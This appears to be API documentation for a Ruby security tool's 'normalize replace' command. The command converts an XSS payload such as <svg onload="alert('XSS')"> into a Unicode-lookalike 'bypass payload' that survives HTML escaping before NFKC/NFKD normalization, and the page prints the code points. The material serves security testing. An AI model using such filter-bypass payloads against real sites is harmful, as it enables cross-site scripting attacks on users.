Class: Unisec::CLI::Commands::Normalize::Replace

Inherits:

Dry::CLI::Command

• Object
• Dry::CLI::Command
• Unisec::CLI::Commands::Normalize::Replace

Defined in:

lib/unisec/cli/normalization.rb

Overview

Command unisec normalize replace "example"

Example:

➜ unisec normalize replace "<svg onload=\"alert('XSS')\">"
Original: <svg onload="alert('XSS')">
  U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E
Bypass payload: ﹤svg onload=＂alert(＇XSS＇)＂﹥
  U+FE64 U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+FF02 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+FF07 U+0058 U+0053 U+0053 U+FF07 U+0029 U+FF02 U+FE65
NFKC: <svg onload="alert('XSS')">
  U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E
NFKD: <svg onload="alert('XSS')">
  U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E

➜ echo -n "<svg onload=\"alert('XSS')\">" | unisec normalize replace -

Instance Method Summary

• #call(input: nil, **_options) ⇒ Object

  Prepare a XSS payload for HTML escape bypass (HTML escape followed by NFKC / NFKD normalization).

Instance Method Details

#call(input: nil, **_options) ⇒ Object

Prepare a XSS payload for HTML escape bypass (HTML escape followed by NFKC / NFKD normalization)

Parameters:

• input (String) (defaults to: nil) —

  Input string to normalize

# File 'lib/unisec/cli/normalization.rb', line 79

def call(input: nil, **_options)
  input = $stdin.read.chomp if input == '-'
  puts Unisec::Normalization.new(input).display_replace
end